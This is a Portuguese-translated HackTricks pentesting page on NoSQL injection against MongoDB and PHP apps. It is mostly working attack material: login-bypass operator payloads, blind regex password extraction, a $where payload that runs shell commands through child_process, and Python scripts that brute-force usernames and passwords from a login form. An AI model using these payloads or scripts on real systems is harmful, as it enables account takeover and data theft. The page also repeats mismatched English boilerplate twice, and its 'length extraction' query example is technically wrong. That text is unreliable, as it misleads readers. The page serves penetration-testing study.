hacktricks/pentesting-web/nosql-injection.md

411 lines
22 KiB
Markdown

# Injeção NoSQL
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente, utilizando as ferramentas comunitárias mais avançadas do mundo.\
Acesse hoje mesmo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
Bancos de dados NoSQL oferecem restrições de consistência mais flexíveis do que os bancos de dados SQL tradicionais. Ao exigir menos restrições relacionais e verificações de consistência, os bancos de dados NoSQL geralmente oferecem benefícios de desempenho e escalabilidade. No entanto, esses bancos de dados ainda podem ser vulneráveis a ataques de injeção, mesmo que não estejam usando a sintaxe SQL tradicional.
## Exploração
Em PHP, você pode enviar um Array alterando o parâmetro enviado de _parameter=foo_ para _parameter\[arrName]=foo._
Os exploits são baseados na adição de um **Operador**:
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### Bypass de autenticação básica
**Usando não igual ($ne) ou maior ($gt)**
```bash
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**
NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB. Similar to SQL injection, it occurs when an attacker is able to manipulate a NoSQL query in order to retrieve, modify, or delete data from the database.
#### **Understanding NoSQL Injection**
NoSQL databases, like MongoDB, use a different query language than traditional SQL databases. Instead of using structured query language (SQL), they use a query language specific to the database system, such as MongoDB's query language.
NoSQL injection occurs when an attacker is able to manipulate the query parameters or input in a way that the application does not properly sanitize or validate. This allows the attacker to inject malicious code or operators into the query, which can lead to unauthorized access or manipulation of the database.
#### **Common NoSQL Injection Techniques**
1. **Query Parameter Manipulation**: Attackers can manipulate query parameters to modify the behavior of the query. For example, they can modify the query to retrieve all records instead of a specific subset.
2. **Operator Injection**: Attackers can inject operators into the query to modify its behavior. For example, they can inject the `$ne` (not equal) operator to bypass authentication and retrieve sensitive data.
3. **Code Injection**: Attackers can inject malicious code into the query, which can be executed by the database. This can lead to unauthorized access or execution of arbitrary commands.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection, it is important to follow secure coding practices:
1. **Input Validation**: Validate and sanitize all user input before using it in a query. This includes checking for malicious characters or patterns.
2. **Parameterized Queries**: Use parameterized queries or prepared statements to separate the query logic from the user input. This helps prevent injection attacks by treating user input as data, rather than executable code.
3. **Least Privilege Principle**: Ensure that the database user account used by the application has the least privileges necessary to perform its intended functions. This limits the potential impact of an injection attack.
By following these best practices, you can help protect your NoSQL databases from injection attacks and maintain the security of your application.
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00
```
### Extrair informações de **comprimento**
NoSQL Injection pode ser usado para extrair informações sobre o comprimento dos dados armazenados em um banco de dados NoSQL. Isso pode ser útil para entender a estrutura do banco de dados e identificar possíveis vulnerabilidades.
#### Técnica de Injeção
A técnica de injeção NoSQL envolve a exploração de consultas que usam operadores de comparação, como `$gt` (maior que), `$lt` (menor que) ou `$eq` (igual a). Ao fornecer valores manipulados para esses operadores, é possível obter informações sobre o comprimento dos dados.
#### Exemplo
Considere a seguinte consulta NoSQL:
```javascript
db.users.find({ username: { $eq: "admin" } })
```
Para extrair informações sobre o comprimento do campo `username`, podemos fornecer um valor manipulado para o operador `$eq`:
```javascript
db.users.find({ username: { $eq: { $ne: null } } })
```
Se a consulta retornar um resultado, isso indica que o comprimento do campo `username` é maior que zero. Caso contrário, o comprimento é zero.
#### Considerações de Segurança
Para proteger um aplicativo contra injeção NoSQL, é importante validar e sanitizar todas as entradas do usuário. Além disso, é recomendável usar bibliotecas ou frameworks que ofereçam recursos de segurança embutidos para mitigar esse tipo de vulnerabilidade.
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### Extrair informações **data**
NoSQL injection is a type of attack that targets NoSQL databases, which are non-relational databases that store data in a flexible, schema-less format. This attack occurs when an attacker is able to manipulate a NoSQL query in order to retrieve unauthorized data or perform unauthorized actions.
In a NoSQL injection attack, the attacker takes advantage of vulnerabilities in the application code that interacts with the NoSQL database. These vulnerabilities can allow the attacker to inject malicious code into the query, which can then be executed by the database.
One common method of NoSQL injection is through the manipulation of query parameters. By modifying the values of these parameters, an attacker can change the behavior of the query and potentially retrieve sensitive information.
For example, consider a web application that uses a NoSQL database to store user information. The application may have a login feature that checks if a given username and password match a record in the database. The query used to perform this check may look something like this:
```javascript
db.users.find({ username: 'admin', password: 'password123' })
```
In a NoSQL injection attack, an attacker could manipulate the query parameters to bypass the login check and retrieve all user records from the database. For example, by providing the following input:
```
username: { $ne: null }, password: { $ne: null }
```
The resulting query would retrieve all user records, regardless of the username and password provided.
To prevent NoSQL injection attacks, it is important to properly validate and sanitize user input before using it in a database query. This can include techniques such as input validation, parameterized queries, and output encoding.
By following secure coding practices and regularly testing for vulnerabilities, developers can help protect their applications from NoSQL injection attacks and ensure the security of their data.
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
...
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**
NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB. Similar to SQL injection, it occurs when an attacker is able to manipulate a NoSQL query in order to retrieve, modify, or delete data from the database.
#### **Understanding NoSQL Injection**
NoSQL databases, like MongoDB, use a different query language than traditional SQL databases. Instead of using structured query language (SQL), they use a query language specific to the database system, such as MongoDB's query language.
NoSQL injection occurs when an attacker is able to manipulate the query parameters or input in a way that the application does not properly sanitize or validate. This allows the attacker to inject malicious code or operators into the query, which can lead to unauthorized access or manipulation of the database.
#### **Common NoSQL Injection Techniques**
1. **Query Parameter Manipulation**: Attackers can manipulate query parameters to modify the behavior of the query. For example, they can modify the query to retrieve all records instead of a specific subset.
2. **Operator Injection**: Attackers can inject operators into the query to modify its behavior. For example, they can inject the `$ne` (not equal) operator to bypass authentication and retrieve sensitive data.
3. **Code Injection**: Attackers can inject malicious code into the query, which can be executed by the database. This can lead to unauthorized access or execution of arbitrary commands.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection, it is important to follow secure coding practices:
1. **Input Validation**: Validate and sanitize all user input before using it in a query. This includes checking for malicious characters or patterns.
2. **Parameterized Queries**: Use parameterized queries or prepared statements to separate the query logic from the user input. This helps prevent injection attacks by treating user input as data, rather than executable code.
3. **Least Privilege Principle**: Ensure that the database user account used by the application has the least privileges necessary to perform its intended functions. This limits the potential impact of an injection attack.
By following these best practices, you can help protect your NoSQL database from injection attacks and maintain the security of your application.
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found
```
### Execução Arbitrária de Função em PHP
Utilizando o operador **$func** da biblioteca [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (usada por padrão), pode ser possível executar uma função arbitrária, como descrito neste [relatório](https://swarm.ptsecurity.com/rce-cockpit-cms/).
```python
"user":{"$func": "var_dump"}
```
![](<../.gitbook/assets/image (468).png>)
### Obter informações de uma coleção diferente
É possível usar [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) para obter informações de uma coleção diferente. No exemplo a seguir, estamos lendo de uma **coleção diferente** chamada **`users`** e obtendo os **resultados de todas as entradas** com uma senha correspondente a um caractere curinga.
```json
[
{
"$lookup":{
"from": "users",
"as":"resultado","pipeline": [
{
"$match":{
"password":{
"$regex":"^.*"
}
}
}
]
}
}
]
```
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente, utilizando as ferramentas comunitárias mais avançadas do mundo.\
Acesse hoje mesmo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Blind NoSQL
```python
import requests, string
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(21):
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("<TRUE>" in r.text):
flag += char
print("[+] Flag: "+flag)
break
```
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
## Cargas úteis do MongoDB
### Injeção de NoSQL
A injeção de NoSQL é uma técnica de ataque que visa explorar vulnerabilidades em bancos de dados NoSQL, como o MongoDB. Essa técnica é semelhante à injeção de SQL, mas é adaptada para bancos de dados NoSQL.
### Cargas úteis para Injeção de NoSQL
Aqui estão algumas cargas úteis comuns usadas para explorar vulnerabilidades de injeção de NoSQL em bancos de dados MongoDB:
1. **Carga útil de autenticação**: essa carga útil é usada para tentar autenticar como um usuário específico no banco de dados MongoDB. Ela pode ser usada para explorar vulnerabilidades de autenticação fraca.
```javascript
{"$ne": 1, "username": "admin", "password": {"$ne": 1}}
```
2. **Carga útil de enumeração**: essa carga útil é usada para enumerar informações sobre o banco de dados, como nomes de coleções e campos.
```javascript
{"$where": "sleep(1000)"}
```
3. **Carga útil de injeção condicional**: essa carga útil é usada para explorar vulnerabilidades de injeção condicional, onde a aplicação executa consultas condicionais no banco de dados.
```javascript
{"$gt": "", "username": "admin", "password": {"$regex": "^a"}}
```
4. **Carga útil de injeção de comandos**: essa carga útil é usada para executar comandos no servidor MongoDB.
```javascript
{"$where": "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('ls').toString()"}
```
### Considerações finais
Essas cargas úteis são apenas exemplos e podem variar dependendo do contexto e da aplicação específica. É importante entender as vulnerabilidades de injeção de NoSQL e adaptar as cargas úteis de acordo com o cenário de teste.
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## Ferramentas
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)
### Força bruta para obter nomes de usuário e senhas de login através de POST
Este é um script simples que você pode modificar, mas as ferramentas anteriores também podem realizar essa tarefa.
```python
import requests
import string
url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")
def get_usernames():
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
for c in possible_chars:
username = "^" + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print("Found username starting with "+c)
while True:
for c2 in possible_chars:
params["username[$regex]"] = username + c2 + ".*"
if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
username += c2
print(username)
break
if c2 == possible_chars[-1]:
print("Found username: "+username[1:])
usernames.append(username[1:])
break
return usernames
for u in get_usernames():
get_password(u)
```
## Referências
* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** com facilidade, utilizando as ferramentas comunitárias mais avançadas do mundo.\
Acesse hoje mesmo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}